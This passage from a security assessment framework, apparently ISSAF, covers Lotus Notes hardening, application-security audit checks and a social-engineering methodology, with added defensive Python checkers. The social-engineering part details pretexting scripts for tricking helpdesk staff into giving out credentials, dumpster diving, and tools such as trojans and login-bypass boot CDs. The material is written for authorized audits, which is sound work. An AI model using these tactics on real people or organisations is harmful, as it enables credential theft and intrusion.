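            findings.append(f"{key} is {settings.get(key, 'not set')}, expected {wanted}")
    for wrong, right in MISSPELLED.items():
        if wrong in settings:
            findings.append(f"{wrong} is ignored by the server; use {right}")
    return findings


if __name__ == "__main__":
    for label, ini in (("weak", WEAK_INI), ("fixed", FIXED_INI)):
        print(label, relay_findings(parse_notes_ini(ini)) or ["no findings"])
```

The spelling trap in the warning is the point of the MISSPELLED table: a key that is merely similar to the documented one is accepted by the file but ignored by the server, so the check reports it as a finding rather than as a satisfied setting.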
3. Encryption
If your users require encrypted content with people outside your Notes domain you will need to employ an S/MIME solution. That entails managing some keys, which Notes does easily when you know how; find someone who knows how to do it well and you'll be fine. Don't let the inmates run your S/MIME asylum. You may have regulatory requirements to be able to monitor mail content. If you're not managing the encryption then you may find yourself unable to meet regulatory requirements.
Port Encryption: Enable port encryption for all ports.
Database encryption: All important databases must be encrypted.
4. Restrict use to iNotes
Use iNotes only if the remote PC is secured. Temp files and attachments are left on the remote PC. VPN / SSL VPN products claim to clean up temp directories and they do an excellent job in a normal disconnect. If the connection drops or the remote PC hangs the VPN won't help you clean up anything. They do not guard against spyware, key loggers etc. Blackberries may be considered.
4. Check backup software
Check to see if the backup software can back up open files.
5. Check for UPS availability
Check to see if the server has been connected to a UPS.
6. Check utilisation of design templates during application development
Database templates and the design task should be used to maintain databases. Procedures must be implemented that require database designers to utilize design templates when making changes to production Domino applications. This helps to restrict the database designers' access to production data. This is accomplished by forcing the database designers to make all database changes to database templates. Changes to the templates, which do not include production data, are automatically applied via the design task at 12 p.m. every evening (or whenever scheduled).
7. Remove unnecessary services and tasks
Stop all unnecessary services and remove non Lotus Notes related software.
8. Modem Connectivity
If the server has a modem attached to it, all calls must be logged.
9. Anti Virus
The mailing solution must have anti virus. It will help if the OS too has anti virus protection.
10. Latest Patches
Check to see if the OS and Lotus Notes have the latest patches.
11. OS Hardening
Check to see if the OS is hardened as per best practices.
12. Avoiding replication Conflicts
Check to see if the Administrator reviews the replication logs for conflicts.
13. Duplicate copies of databases
Multiple replicas of a database should not be kept on one Domino server. Utilize the Database Copy functionality within Domino to make a copy, as the new database copy will have a unique replica ID.
14. User Maintenance
Check to see if procedures exist to delete users as they leave the organization. The list must be up to date.
15. Password Controls
Passwords must be configured to be at least 8 characters long.
16. Access Control Lists
All databases and their replicas must have access control lists. Internet access for each database must also be configured accordingly. Default and anonymous connections to databases must also be set to no access.
17. OS Level File Access
Check to see that access control has been implemented on the OS.
18. Usage of Fully Qualified Names
Fully qualified names must always be used.
19. Group Cascading
Groups should not be cascaded down to more than five levels.
20. Review Access Control to important files
Access control to the following files must be reviewed: LOG.NSF, CERTLOG.NSF, STATS*.NSF, WEBADMIN.NSF, DOMCFG.NSF, STATREP.NSF, NAMES.NSF, ADMIN4.NSF, EVENTS4.NSF, CATALOG.NSF, MAIL*.BOX
21. Restriction to create databases
Creation of databases must be restricted to select users.
22. Deny Anonymous connections
Verify that the "Allow anonymous Notes connections:" option has been set to "No" on all applicable Domino server documents.
23. Domino as a service
Run Domino as a service and set it to start automatically when the machine boots.
24. NSF Formats
All databases must have NSF extensions to avail all security features.
25. Select only one protocol for access
Verify that only one protocol is used for communication.
26. Protect the Passthru Functionality
Inspect the Passthru section of the server document on all servers. If Passthru is used, review the group members and ensure that only the necessary people are members of the Passthru users group.
27. Review of LOGS
Check that procedures exist to review session logs, user activity logs for critical databases, replication logs, certification logs and mail routing logs.
28. Segregation of development, testing and Live environment
The Live, testing and Development environments must be different.
29. Licenses
Check to see if all users are licensed.
30. Trained Administrators
Check to see if the administrator is a Lotus Notes Certified Administrator.
W SOURCE CODE AUDITING
[Details on this section will be provided in next release of ISSAF]
X BINARY AUDITING
This document attempts to give the user conceptual knowledge on some aspects like
binary auditing and disassembly. This shall be covered with a brief explanation of
concepts like memory in modern operating systems. Then the auditing covers aspects
like understanding network packets and also stand-alone auditing by tracing system
calls. This assumes that the reader has a basic understanding of concepts like sockets
and system related functions. Following this, the PE structure shall be examined briefly
to explain how analysis can be done for PE files.
Considering the nature of the topic in discussion, it's generally overwhelming for the
reader to cover so many aspects in Binary Auditing. Hence, the purpose of the document
is to be a jumpstart for the reader so that he can follow binary auditing with ease and be
ready to start work on his own. This document is by no means a complete guide to the
subject nor do the authors take responsibility for the results that the reader might
encounter while trying out the steps mentioned.
X.1 METHODOLOGY
Some of the methods that involve detecting vulnerabilities in software can be broadly
divided into the following:
• Fuzz testing
• Stress testing
• Binary auditing
[Details on this section will be provided in ISSAF release 1.0]
Y APPLICATION SECURITY EVALUATION CHECKS
Introduction
Applications Security
Applications security ensures that operational applications supporting a business process
are purchased, developed, deployed and maintained in a secure manner.
Prerequisite
• Minimum baseline standard established for each component
• Current configuration items from each component
Objective
• To identify gaps in the minimum baseline standard for each component
• To identify gaps in current configuration items
Evaluation Check
Each check is recorded as Yes / No / N/A together with the evaluation performed and its results.
1 Have the following been considered during application design:
1.1 Structured design methodology used
1.2 Processing requirements of the application
1.3 Performance requirements
1.4 Considerations for operational configuration and transaction processing requirements
1.5 Consideration for use of code in other applications
1.6 Ease of installation
1.7 Operational requirements
1.8 Considerations relating to application processing at multiple locations
1.9 Future change requirements
1.10 Security requirements
1.11 Auditability considerations
1.12 Help text and training manuals
1.13 External third party requirements
1.14 System design documentation
1.15 Independent examination for security requirements
1.16 Data communications requirements
1.17 System requirements specification document
1.18 Security requirements specification document
2 Checks for incomplete, incorrect or inconsistent data processing within the application, and between other applications/systems
2.1 Is the application developed in house?
2.2 Is the application purchased from a vendor?
2.3 Is a complete security requirements specification document available?
2.4 Is there an internal development, maintenance, testing and user support team?
2.5 Was the experience of personnel that developed the application evaluated?
2.6 Is there appropriate segregation of responsibilities between developers, including the testing team?
2.7 Is the source code strictly controlled?
2.8 Is there appropriate segregation of testing, development and production facilities?
2.9 Is there sufficient staff to support the application, database and the underlying operating systems?
3 Is application development outsourced?
4 Do external contract staff for development sign confidentiality agreements and NDAs?
5 Are there sufficient escrow agreements undertaken with the application vendor?
6 Are audit trails and logging performed on development, source code library and operational systems?
7 Has each line of code been reviewed or a walkthrough performed?
8 Are application program staff aware of security requirements for the application?
9 Is comprehensive testing performed before the application is deployed to production?
10 Does testing include verifying that access control, audit and validation mechanisms function correctly?
11 Does testing include reaction to error conditions and out-of-sequence records?
12 Is access to development source programs restricted to programmers that are developing the software?
13 Are program libraries regularly backed up?
14 Are all program changes authorised by appropriate management?
15 Is there a design for choosing passwords during development?
16 Are development user-ids shared?
17 Is an automatic terminal time-out facility available?
18 Are there sufficient procedural controls?
19 Is data input into the application subject to appropriate validation controls? Are the following validation checks considered:
20 Out of range checks
21 Invalid characters in fields
22 Missing or incomplete data
23 Exceeding data volume limits
24 Unauthorised control data
25 Session or batch controls
26 Balancing controls
27 Validate system generated data
28 Check transfers between computers
29 Hash totals of files
30 Programs run at correct time
31 Programs run in correct order
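As an added illustration of the validation controls in checks 19 to 31 (this is not code from the framework), the Python batch validator below applies out-of-range, invalid-character, missing-data, volume-limit, unauthorised-control-data, record-count, balancing and hash-total checks to a constructed transaction batch. The record layout, the trailer fields, the field rules and the limits are assumptions for the example.

```python
"""Input validation controls from checklist items 19 to 31 over a constructed batch.

Added illustration; the batch format, field rules and limits are assumptions for
this example, not part of the framework.
"""
import re

MAX_RECORDS = 5                          # data volume limit (assumed)
AMOUNT_RANGE = (0.01, 10000.00)          # out-of-range check bounds (assumed)
ACCOUNT_RE = re.compile(r"^[0-9]{6}$")   # account numbers are six digits (assumed)
ALLOWED_CODES = {"DEP", "WDR"}           # authorised control data (assumed)

# Constructed batch: REC lines carry id, account, amount, code; the TRL line carries
# the declared record count, the control (balancing) total and a hash total over the
# account numbers (a plain sum with no financial meaning).
BATCH = """\
REC,000123,250.00,DEP
REC,000456,12000.00,WDR
REC,00A789,15.50,DEP
REC,000321,,WDR
REC,000654,40.00,XFR
TRL,5,12305.50,2343
"""


def _number(text):
    try:
        return float(text)
    except ValueError:
        return None


def validate_record(fields):
    """Return a list of problems for one record (empty list = record passes)."""
    if len(fields) != 4:
        return ["incomplete record"]
    _, account, amount, code = fields
    problems = []
    if not account or not amount or not code:
        problems.append("missing data")
    if account and not ACCOUNT_RE.match(account):
        problems.append(f"invalid characters in account {account!r}")
    if amount:
        value = _number(amount)
        if value is None:
            problems.append(f"invalid characters in amount {amount!r}")
        elif not AMOUNT_RANGE[0] <= value <= AMOUNT_RANGE[1]:
            problems.append(f"amount {value} out of range")
    if code and code not in ALLOWED_CODES:
        problems.append(f"unauthorised control data {code!r}")
    return problems


def validate_batch(text):
    """Apply record checks, then batch-level count, balancing and hash-total controls."""
    findings = []
    records, trailer = [], None
    for n, line in enumerate(text.splitlines(), 1):
        fields = line.split(",")
        if fields[0] == "TRL":
            trailer = fields
        elif fields[0] == "REC":
            records.append(fields)
            findings.extend(f"line {n}: {p}" for p in validate_record(fields))
    if len(records) > MAX_RECORDS:
        findings.append(f"batch exceeds volume limit of {MAX_RECORDS} records")
    if trailer is None or len(trailer) != 4:
        findings.append("batch control missing or incomplete (no valid trailer)")
        return findings
    declared_count, declared_total, declared_hash = int(trailer[1]), float(trailer[2]), int(trailer[3])
    if declared_count != len(records):
        findings.append(f"record count {len(records)} differs from declared {declared_count}")
    amounts = [_number(r[2]) for r in records if len(r) == 4]
    total = sum(a for a in amounts if a is not None)
    if abs(total - declared_total) > 0.005:
        findings.append(f"control total {total:.2f} differs from declared {declared_total:.2f}")
    hash_total = sum(int(r[1]) for r in records if len(r) == 4 and r[1].isdigit())
    if hash_total != declared_hash:
        findings.append(f"hash total {hash_total} differs from declared {declared_hash}")
    return findings


if __name__ == "__main__":
    for finding in validate_batch(BATCH):
        print(finding)
```

In the sample, a corrupted account number fails the character check and also breaks the hash total that the sender computed from the original value, which is what the hash total is for: it ties an alteration in one field back to the batch as a whole, something the per-record checks alone do not do.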
32 Is message authentication performed?
33 Is implementation of a new system or an upgrade to an existing system performed with appropriate change management? Are the following considered:
34 S/w update by program librarian
35 Executable code only
36 Evidenced acceptance & testing
37 Audit log of library updates
38 Previous s/w revisions maintained
39 Is system test data appropriately controlled and protected?
40 Is test data subject to the same controls as live data?
41 Is a change control procedure in place?
42 Are security changes to operating systems reviewed for impact on the application systems?
43 Are vendor supplied packages modified?
44 Is access to program source libraries restricted to the program librarian?
45 Is a formal risk analysis performed before performing the modifications?
46 Are programs examined for trojan code and covert channels?
47 Is output data from programs validated?
48 Is cryptography considered for applications?
9 SOCIAL ENGINEERING
Social engineering attacks are by far the simplest method of gaining information
without actually compromising the security tools deployed on the information systems.
According to Webster's dictionary it is "the management of human beings in accordance
with their place & function in society, applied social science". Through a successful
social engineering attack a hacker can easily get information by asking for it instead of
having to break or subvert security measures installed on information systems.
Most information systems depend on a certain level of trust for their functioning. For example,
large organizations depend heavily on e-mail and remote access for communication,
and often all users are assigned user-ids and passwords for their access. If users
misplace their passwords they have the flexibility of calling the IT Helpdesk and getting
their passwords changed. When a user calls the IT Helpdesk to reset access, a
certain level of trust is established between the user and the helpdesk analyst. A
hacker tries to create this trust to gain valuable information from the helpdesk analyst.
What is Social Engineering?
Social Engineering: Term used among crackers for cracking techniques that rely on
weaknesses in wetware rather than software; the aim is to trick people into revealing
passwords or other information that compromises a target system's security. Classic
scams include phoning up a mark who has the required information and posing as a field
service tech or a fellow employee with an urgent access problem.
The term "wetware" refers to the mind of the target/mark, or the people you try to social
engineer.
Social engineering cannot be based upon scripts, as all people are different from one
another; you have to rely on what you know about the company/person and your own
spark of creativity to gain the information needed.
What are the Benefits of Social Engineering?
Using social engineering techniques, the auditor/pen-tester can gain sensitive information,
like user credentials (usernames and passwords), from people working in the audited
company/organisation, exploiting the most vulnerable part of the security system: the
human part.
This technique is the most rewarding method of gaining information from a target/mark
without actually deploying any virtual tools or methods of virtual attack to gain the sensitive
information needed.
The auditor must use this method first, because it can give him a good starting point to
further exploit the company/organisation that he targets.
Through social engineering one can sometimes gain the highest level of access on a system
with ease, while being virtually untraceable by the target. Regular accounts to
start with, or even high level access accounts, can be obtained using social engineering.
Information regarding the topology of the audited company/organisation, such as
hardware and software information, can also be obtained and can lead to an easier way of
compromising the security of the audited company/organisation.
Types of Social Engineering
Social Engineering can be broken into sub-types like:
• Regular social engineering: direct contact with the target/mark by phone, email or
other methods of communication to gain the information required.
• Reverse social engineering: create an unusual situation for the target/mark to
handle and offer outside help; one can gain sensitive information from the
target/mark through this process.
Purpose
The purpose of this document is to offer a good level of information regarding the
gathering information method known as “Social Engineering”, so the auditor/pen-tester
can understand and deploy this method to gain the information needed during an audit
for a company/organisation.
Requirement
The requirements for this method of gaining information to work are: a good
understanding of the company's/organisation's environment and a good understanding of
the ways to manipulate a person to gain trust and then to exploit this level of trust to
obtain sensitive information from the target.
Understand Organization’s environment
Before the auditor/pen-tester can start a social engineering session, a good knowledge
of the company's/organisation's environment is needed. Things like hardware and software
infrastructure, the problems the company/organisation may have with its environment, the
levels of organisation inside the target, partners, customers, etc. are very good to know
before starting a social engineering session. Knowing more about your target environment
can be very helpful in establishing a good level of trust during a social engineering session.
Technical Requirements
The auditor/pen-tester must have the means to communicate with the target before
establishing a social engineering session. So the technical requirements for social
engineering are: phone, fax and email as virtual ways of communication, and also "on-the-spot"
access, meaning a face-to-face discussion with the target. The virtual ways of
communication are better and far less dangerous than a real face-to-face discussion with
the target, so they are the main technical requirement for this type of information
gathering technique.
History
Social Engineering has a big history on its side. It was and is still used by hackers of all
hats everywhere. The most famous black-hat hacker who used social engineering to
obtain sensitive information from his targets is Kevin Mitnick. In the '90s, he used social
engineering to get sensitive information like usernames and passwords, technical
information and even source code from many important companies and big corporations.
Objective
The main objective in using social engineering is to get sensitive information from your
target, information that can't be obtained by regular information gathering techniques.
Usernames and passwords, technical information about the hardware and software your
target uses, problems in hardware and software that can be exploited further to gain
higher levels of access on the target computer systems, and more, can be very easily
obtained through social engineering sessions.
Perspective One
From the Security Assessor’s /Penetration Tester’s perspective, social engineering is an
easy way to get access to the target’s computer systems and exploit the levels of access
needed to reach the main objective of the assessment.
Perspective Two
From the System Administrator’s perspective, social engineering is the most difficult “to
patch” and the most dangerous vulnerability in the computer systems he needs to
maintain.
Expected Result
After using social engineering, the security auditor/pen-tester expects to have at least a
good way of access into the audited company/organisation. Either direct access, through
some usernames and passwords, or indirect access, through some information that he
can use to gain a higher level of access into the audited computer systems using regular
tools of trade.
9.1 METHODOLOGY
The audit of a company/organisation must contain a social engineering overview and all
the known issues regarding this.
The auditor must not reveal to any employee that he will be social engineered. Only the
right people in the company need to be briefed about the job of the auditor.
This resolves the problem of a rogue employee who acts from "the inside", since such an
employee will not be alarmed about the auditor's job in the company/organisation. As
much secrecy as is needed is required before and during this security audit.
• Employee Trainings
o Handling Sensitive Information
o Password Storage
o Shoulder Surfing
o Revealing Passwords on Phone
o Physical Access to workstations
• Helpdesk
o Masquerading as a User
o Masquerading as Monitoring Staff
• Dumpster Diving
• Reverse Social Engineering
9.2 EMPLOYEE TRAININGS
Description
Employee training on the organization's IT control policies and security process may be
one of the most effective methods of preventing social engineering attacks. The
auditor/tester can probe the employees and get them to reveal company-sensitive
information. The auditor could also conduct off-working-hour checks and try to gather
information in the form of company-sensitive documents.
Objective
The employees will need to be fully briefed about the dangers of social engineering and
they must be checked regularly to see if they comply with a specific internal policy about
offering sensitive information to persons inside and outside the company.
Expected Results
If the company's/organisation's employees fully understand the danger they can be to
the company/organisation, they will not make any mistakes, and this is the main
expectation.
Process
• Handling Sensitive Information
• Password Storage
• Shoulder Surfing
• Revealing Passwords on Phone
• Physical Access to workstations
9.2.1 Handling Sensitive Information
Description
Look for documents lying on the users' work desks and fax machines/servers, and for
sensitive information (e.g. passwords, network architecture designs written with IP addresses /
host names on boards). These documents may reveal company-sensitive data on
financials, designs, strategies etc. This information could be helpful in giving the users
the impression that you have authority to the information and getting them to reveal the
information you require. This may also be helpful in obtaining access by getting them to
reveal their user-ids and passwords.
Analysis/Conclusion/Observation
Review any policy regarding the handling of sensitive information in the audited
company/organisation.
Check for documents, papers, sticky-notes and other things that can be used to gain
access to the company’s networks for an attack. Also financial data, charts, diagrams,
lists of employees, security plans and other things that can be used successfully to pull a
social engineering session to gain more information that can be lead to the compromise
of the audited company/organisation.
Check to see one can steal any hardware that stores sensitive information. Things like
handhelds, laptops, external drives, or even internal drives from machines that aren’t
properly outside secured.
Countermeasures
Use paper shredders for any document that is no longer needed. The shredded paper must also be kept in a secure place until disposal, so that there is no chance of outside intruders stealing the shreds and reconstructing the original documents from them.
Secure-deletion ("virtual shredder") tools must likewise be used to erase sensitive information from the drives of workstations, servers or any other computer equipment, so that theft of the hardware does not allow recovery of deleted information. Do not resell equipment that has stored sensitive information without fully checking that no sensitive company information remains on it. In the past, many cases have been reported of sold hardware containing sensitive information that was then used to attack the same company.
Keep all workstations and servers in separate rooms that can only be accessed using secure access cards or even biometric equipment. Secure all printers, all handhelds and phones and, most importantly, all laptops that may contain sensitive information. Laptops and handhelds are easily stolen, revealing sensitive information about the company/organisation to a third party who can use it to compromise the security of the company/organisation involved.
Tool[s]
Pen and paper to note all the information needed. A bag to collect all the papers and documents concerning the security and environment of the target.
Remarks
This is also a good starting point from which one can later conduct successful social engineering sessions, using the information gained through weaknesses in the handling of sensitive information in the company/organisation.
9.2.2 Password Storage
Description
Look for passwords that users have written down and kept close to their workstations. Passwords written down by users are often found among a pile of pages on their desk or on the first/last page of a writing pad. Examine all post-it notes stuck around the user's workplace, which may also reveal this information. Look for keys behind/under monitors which could give access to drawers; passwords may be written in pads kept in these locked drawers.
Analysis/Conclusion/Observation
Employees should not stick post-it notes on their monitors, nor write their passwords down anywhere. Passwords must also not be kept in a file on the workstation desktop.
A good password policy must be in use in the company/organisation. The auditor must test it for any weaknesses that could lead to password compromise.
Countermeasures
• Do not write passwords on sticky notes on monitors and/or desks.
• A password policy must be adopted by the company.
• Passwords must be at least 8 characters long and use letters, numbers and special characters. Do not use passwords that are easy to guess or that are based on personal details: mother's maiden name, phone number, birthday, pet's name, favourite football team and similar choices. The draft's further requirement that all passwords be changed every week is no longer considered good practice: current guidance (e.g. NIST SP 800-63B) favours long passwords screened against lists of known-compromised passwords, with rotation only on suspected compromise.
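As an added example (not part of ISSAF), the following Python check applies the rules above to a candidate password and, going one step beyond the text, screens it against the personal details an auditor could collect about the user: name, pet, team, phone number and birthday. The profile field names and the sample profile are constructed assumptions, as is the list of "leet" substitutions used to catch disguised words such as "Ars3nal".

```python
"""Password policy check with screening against the user's own personal details.

Added example (not ISSAF code). Profile field names and the sample
profile are constructed for illustration; the rules follow the policy
above: at least 8 characters, letters + digits + special characters,
and nothing derived from personal information.
"""
import re
from datetime import date

MIN_LENGTH = 8
CLASSES = {
    "letter": re.compile(r"[A-Za-z]"),
    "digit": re.compile(r"[0-9]"),
    "special": re.compile(r"[^A-Za-z0-9]"),
}
# Common substitutions users make to disguise a word ("Ars3nal", "R3x").
LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a",
                      "5": "s", "7": "t", "@": "a", "$": "s"})

# Constructed sample profile of the kind the auditor could assemble from
# desk photos, social media or a directory listing.
SAMPLE_PROFILE = {
    "username": "jsmith",
    "first_name": "John",
    "last_name": "Smith",
    "mother_maiden_name": "Keller",
    "pet": "Rex",
    "team": "Arsenal",
    "phone": "+44 20 7946 0123",
    "birthday": date(1985, 6, 14),
}


def _normalise(s):
    """Lower-case and strip everything but letters and digits."""
    return re.sub(r"[^a-z0-9]", "", s.lower())


def personal_tokens(profile):
    """Strings an attacker could guess from the profile (3+ characters)."""
    tokens = set()
    for key in ("username", "first_name", "last_name",
                "mother_maiden_name", "pet", "team"):
        if profile.get(key):
            tokens.add(_normalise(profile[key]))
    if profile.get("phone"):
        digits = re.sub(r"\D", "", profile["phone"])
        tokens.update({digits, digits[-4:]})
    if profile.get("birthday"):
        bd = profile["birthday"]
        tokens.update(bd.strftime(f) for f in
                      ("%Y", "%d%m%Y", "%m%d%Y", "%d%m%y", "%m%d%y", "%d%m"))
    return {t for t in tokens if len(t) >= 3}


def check_password(password, profile):
    """Return the list of policy violations; an empty list means the password passes."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    for name, rx in CLASSES.items():
        if not rx.search(password):
            problems.append(f"no {name} characters")
    plain = _normalise(password)
    deleet = _normalise(password.translate(LEET))
    for tok in sorted(personal_tokens(profile)):
        if tok in plain or tok in deleet:
            problems.append(f"contains personal information ({tok})")
            break
    return problems


if __name__ == "__main__":
    for candidate in ("summer", "Ars3nal!85", "R3x-0123ab", "Tr0ub4dor&3-Quartz"):
        print(f"{candidate!r}: {check_password(candidate, SAMPLE_PROFILE) or 'OK'}")
```

The personal-information check works on a normalised form of the password, so "Ars3nal!85" is caught as the team name and "R3x-0123ab" as the last four digits of the phone number; in practice the same screening should be extended with a list of known-compromised passwords.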
Tool[s]
No specific tools.
Further Reading[s]
Remarks
• Password storage is a sensitive problem in every company/organisation.
• Every person who uses a password in an insecure way exposes the company to outside attacks, so a strong policy on the use of passwords needs to be adopted by every company.
• Other means of authentication can also be used, beyond regular passwords, to authenticate to the internal networks.
9.2.3 Shoulder Surfing
Description
Obtaining a user's password by watching the user type it on the keyboard is known as shoulder surfing. The attack is most successful when passwords are short and uncomplicated. To prevent shoulder surfing, experts recommend that users shield the keyboard from view, using their body to restrict the view or cupping a hand over it. Users in an organization should also make sure that nobody is observing them while they type their passwords.
Analysis/Conclusion/Observation
If given access to the office premises or workstation rooms, the auditor can walk through the offices and see whether he can spot a login session and read the username and/or password a user types to log in to his machine or to the company's network.
Countermeasures
Every user must ask any person in his vicinity to step back while he is logging in.
Type credentials carefully so that they do not have to be entered several times, which would give a person in the vicinity more chances to observe the username and password typed.
Tool[s]
No specific tools. Just a good spirit of observation and a good memory to retain the credentials seen.
Further Reading[s]
Remarks
This technique is usually not possible if the auditor/pen-tester does not have physical access to the audited company's/organisation's premises.
9.2.4 Revealing Passwords on Phone
Description
The easiest way for an attacker to get information is to ask for it. The attacker can call a user pretending to be an IT Helpdesk analyst; a user who believes the call is genuine may end up revealing his user ID and password.
This is basically a social engineering session that reveals usernames and passwords for use in compromising the security of the audited company/organisation.
An attacker will usually obtain minimal access to the network, a regular user account, or at best an administrator account if he can trick an administrator or technical manager into revealing his credentials.
Analysis/Conclusion/Observation
If a user can and will reveal any authentication information over the phone, the company has a serious security problem. Nobody who uses a password in the company may reveal it to anyone, no matter who is asking over the phone.
Checks must be done every week inside the company/organisation to find out which employees will reveal their passwords. Any found must be drastically sanctioned, or at worst dismissed: they are a constant danger to the security of the company, and a person who can easily be tricked into giving out information by phone cannot be trusted to handle any information about the company/organisation.
Countermeasures
• Do not route outside calls directly to regular employees' phones. Use an internal answering and call-logging system instead, so that calls into the premises can be closely monitored for intrusion attempts or other violations of internal security policy.
• Employees must not give out user information or any information about the internal workings of the company/organisation. Internal users must report any odd behaviour they encounter during a phone conversation.
• Internal users must supply in advance a list of the people they need to call, and will be given a list of trusted people inside the company whom they may answer and talk to.
• Anyone who calls to ask for user IDs and passwords must be verified, whether the caller claims to be a regular employee or even a member of the board.
Tool[s]
No specific tools.
Further Reading[s]
Remarks
This is the main vulnerability that is exploited through social engineering sessions. The more information an employee gives out in a phone conversation, the greater the danger to the internal security of the company/organisation.
9.2.5 Physical Access to workstations
Description
An attacker who gains access to a workstation may easily install Trojan code or backdoor programs on it. Since most workstations have Internet connectivity, such backdoors can post sensitive data, including usernames and passwords, to Internet sites controlled by the attacker. The auditor must check whether he is able to access systems because of users who have neglected to shut down or lock their sessions. The auditor may also explore the possibility of removing software or hardware containing sensitive information.
Analysis/Conclusion/Observation
Access to workstations must follow an internal policy. The auditor needs to review this policy and check whether it is well implemented:
• Every employee should have access to one workstation, or to as many as the job description requires. The user of a workstation needs to vet every person who needs access to the workstation(s) he works on, to prevent outside interference.
• Every employee has to report any misconfiguration or any problem concerning direct physical access to his workstation(s).
• Every user must log off or lock his current session every time he leaves his workstation.
• Every user must check the integrity of his workstation(s) when he arrives at and leaves work and report its status, signing for the workstation on arrival and departure. For any problem with his workstation(s), the user must contact the technical department and no one else.
If any of the above is not well implemented, the company has a physical access problem with its machines.
Countermeasures
• Workstations need to be kept in a secure room, separate from the server room. Access to this room must require secure ID cards.
• The access cards must be kept by the company's security officers in a secure vault, issued to each employee only when he arrives at work and taken back when he leaves.
• The access cards must be changed monthly, and all records of card access to the workstation room must be verified daily and kept for at least 6 months in the company archives for later review.
• Every machine must use a computer case that can be locked, to prevent outside access to removable drives such as CD-ROM/RW and floppy drives, to USB/FireWire ports that could be used to insert malicious code into the system, and to the internal drives that hold the OS and files.
• Build the network around servers that provide the services and use only diskless workstations, or have every workstation use only remote access to the servers for work sessions. That way, even an intruder with access to a workstation has no way to insert malicious code into the network or to download/copy sensitive material from the machine/network, and can do far less harm than when he has access to the workstation's entire hard drive and to the network.
Tool[s]
• CD-ROMs with a bootable OS, used to reboot machines running Windows NT/2000/XP and log in without a password, bypassing the regular authentication, a locked session or a password-protected screensaver.
• Password-protected screensaver crackers.
• Trojans with network access, such as BO or SubSeven, or a custom one; also remote keyloggers, spyware and many other malicious programs that can give access to that machine and, through it, to the entire network.
• Removable media (USB drives, floppies, external CD-RW units, external hard drives), used to clone an image of the workstation's OS for later inspection or just to copy sensitive information such as password files, account data, user lists and more.
Remarks
This is an important aspect of the security of a company/organisation.
If an intruder can get physical access to the company's workstations, he can say he has "0wned" that company. Basically, once a machine can be accessed by outside intruders, it no longer effectively belongs to the company/organisation that owns it. It can no longer be trusted, has to be pulled from the network, and needs a forensic analysis to see how large the security impact is for the company's network(s).
Although this has nothing to do with a regular social engineering session, physical access to a workstation can help the process: it gathers more information on the company and so allows a more "productive" social engineering session, as well as giving direct first-hand access to the company's network.
9.3 HELPDESK
Description
An auditor can phone the audited company and pretend to be an insider asking for help, or can invent an imaginary problem, call the company and offer to help fix it, asking in the process for usernames and passwords or other sensitive information from administrators, managers and other people with access to the company/organisation network.
Objective
To acquire a user account, either a regular account or, at best, an administrator account.
Expected Results
Getting a starting point for access to the internal network of the audited company/organisation, using a regular or high-level access account on the audited company/organisation's networks.
Process (Steps to complete this Process/Task/Test Case)
9.4 MASQUERADING AS A USER
Description
IT Helpdesk staff who are reachable by phone can be a great source of information if a social engineering attack succeeds. An attacker can masquerade as a genuine user of the organization and try to obtain information. When the analyst sticks to his operating guidelines, the attacker may resort to high-handedness, pretending to be from senior management. The Helpdesk analyst may be intimidated and end up revealing passwords to the attacker. The auditor may try these methods to obtain valuable information about the organization.
Analysis/Conclusion/Observation
The auditor can pretend to be a regular user who needs a username and password to work remotely, or a member of senior staff, technical support or another high-ranking officer who needs high-level network access for remote work. If the auditor succeeds, he will have direct access to the company networks, compromising the security of the audited company/organisation.
Countermeasures
New users, or users who urgently need access and have forgotten the username and password needed to work remotely, must have their identity properly checked before usernames and passwords are released to them. They must be monitored while working remotely, and when they are next on the company premises they must be re-checked and issued new usernames and passwords, with the old ones deleted.
To avoid this type of attack, the operating guidelines for IT Helpdesk staff must be well defined. The staff must be able to authenticate the user through various methods: either by calling the person back on the mobile number held in the company directory, or by sending the requested information to the person's registered e-mail address.
Tool[s]
No specific tool needed.
Remarks
If an auditor can successfully pretend to be a "lost" user who needs basic authentication information to log in to the network, he will usually get a username and password, a good starting point for accessing the internal network of the company/organisation; from there, he can exploit internal problems in the network to gain higher levels of access and compromise the entire network.
9.4.1 Masquerading as Monitoring Staff
Description
In some cases the attacker may choose to masquerade as staff who monitor the networks that the IT Helpdesk maintains. The attacker may call the Helpdesk Manager, get him/her to believe that there are problems with their systems, and try to obtain information about the helpdesk staff themselves. This attack has been particularly popular against larger organizations. An auditor examining an organization's vulnerability to social engineering attacks should try these same methods.
Analysis/Conclusion/Observation
Call the helpdesk staff and report a misconfiguration or a problem that needs to be solved immediately. Because such problems are urgent, the helpdesk manager will not have time to check whether the person on the phone, the auditor, is who he claims to be.
Try to come up with a realistic scenario of a problem that could occur in the audited company, call someone from the technical department and report it. Offer to help deal with the problem over the phone and ask the technical person for more and more information about the network. If the auditor can social engineer a technical person, he will have access to almost anything in the company through that person. Gaining the trust of a technical person is harder at first, but once gained, that person will be the most helpful source of sensitive information that can lead to a compromise of the audited company's/organisation's security.
Countermeasures
Every helpdesk manager must ask for credentials from the person calling and, after checking that the person really is who he says he is, only then disclose the needed information.
A good set of questions about the company environment, asking things that are not printed or documented anywhere and that only a member of the real staff would know, is a good starting point for such a check.
If the person on the other end hangs up after failing to answer a specific question, the helpdesk manager must recognise that he/she was contacted by an outsider who tried to social engineer them into giving out sensitive information about the inside of the company/organisation.
Tool[s]
No specific tools.
Further Reading[s]
Remarks
This is not an easy social engineering tactic. The auditor must be very good at social engineering to get information from the technical staff of a company/organisation. People working in the technical department are usually more aware than regular employees and will easily spot an attempt to social engineer them into giving out sensitive information. Very good knowledge of the audited company's/organisation's environment is required for this tactic.
9.5 DUMPSTER DIVING
Description
Dumpster diving is another step in the process of gathering information on the target.
Objective
To obtain possibly sensitive information about the target. Items such as employee records, guard shifts, charts/diagrams, other internal company/organisation papers, and even lists of usernames and passwords can be very useful for a later social engineering session.
Expected Results
Results are good when some information is obtained that helps in gaining further access through social engineering sessions, or direct access if a list of usernames and passwords was found.
Process
Dumpster Diving
Description
Dumpster diving, or trashing, as the name suggests means looking for valuable information discarded by the organization as trash. Discarded data may include company phone directories, organization charts, IT policies and manuals. These can reveal vital information to attackers about the identities a hacker could try to impersonate. System manuals may give the attacker an insight into the IT environment (including technology and processes) in use, which in turn can be used to plan an attack. Corporate directories and vacation plans are often not viewed by organizations as sensitive information, so these pages may be thrown away and then misused by attackers.
